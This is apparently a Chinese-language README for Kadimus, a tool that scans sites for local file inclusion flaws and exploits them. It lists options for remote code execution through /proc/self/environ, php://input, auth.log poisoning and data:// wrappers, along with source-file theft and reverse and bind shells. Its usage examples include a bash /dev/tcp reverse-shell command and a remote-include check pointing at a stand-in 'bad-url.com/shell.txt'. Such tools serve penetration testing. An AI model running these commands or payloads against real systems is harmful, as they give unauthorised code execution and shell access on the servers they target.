Kadimus本地文件用于检测网站(LFI)漏洞安全工具。
特性
检测所有URL参数/var/log/auth.log RCE/proc/self/environ RCEphp://input RCEdata://text RCE多线程扫描HTTP命令漏洞代理支持 (socks4://,socks4a://,socks5:// ,socks5h:// and http://)编译
安装libcurl:
CentOS/Fedora
# yum install libcurl-develDebian based# apt-get install libcurl4-openssl-dev安装libpcre:
CentOS/Fedora
# yum install libpcre-develDebian based
# apt-get install libpcre3-dev安装libssh:
CentOS/Fedora
# yum install libssh-devel基于Debian
# apt-get install libssh-dev***执行
$ git clone https://github.com/P0cL4bs/Kadimus.git$ cd Kadimus$ make选项
-h,--help Display this help menu Request: -B,--cookie STRING Set custom HTTP Cookie header -A,--user-agent STRING User-Agent to send to server --connect-timeout SECONDS Maximum time allowed for connection --retry-times NUMBER number of times to retry if connection fails --proxy STRING Proxy to connect,syntax: protocol://hostname:port Scanner: -u,--url STRING Single URI to scan -U,--url-list FILE File contains URIs to scan -o,--output FILE File to save output results --threads NUMBER Number of threads (2..1000) Explotation: -t,--target STRING Vulnerable Target to exploit --injec-at STRING Parameter name to inject exploit (only need with RCE data and source disclosure) RCE: -X,--rce-technique=TECH LFI to RCE technique to use -C,--code STRING Custom PHP code to execute,with php brackets -c,--cmd STRING Execute system command on vulnerable target system -s,--shell Simple command shell interface through HTTP Request -r,--reverse-shell Try spawn a reverse shell connection. -l,--listen NUMBER port to listen -b,--bind-shell Try connect to a bind-shell -i,--connect-to STRING Ip/Hostname to connect -p,--port NUMBER Port number to connect --ssh-port NUMBER Set the SSH Port to try inject command (Default: 22) --ssh-target STRING Set the SSH Host RCE Available techniques environ Try run PHP Code using /proc/self/environ input Try run PHP Code using php://input auth Try run PHP Code using /var/log/auth.log data Try run PHP Code using data://text Source Disclosure: -G,--get-source Try get the source files using filter:// -f,--filename STRING Set filename to grab source [REQUIRED] -O FILE Set output file (Default: stdout)测试示例
扫描:
./kadimus -u localhost/?pg=contact -A my_user_agent./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0获取文件源码:
./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg执行php代码:
./kadimus -t localhost/?pg=php://input -C '' -X input命令执行:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost包括检查远程文件(RFI)漏洞:
/* http://bad-url.com/shell.txt */反弹shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0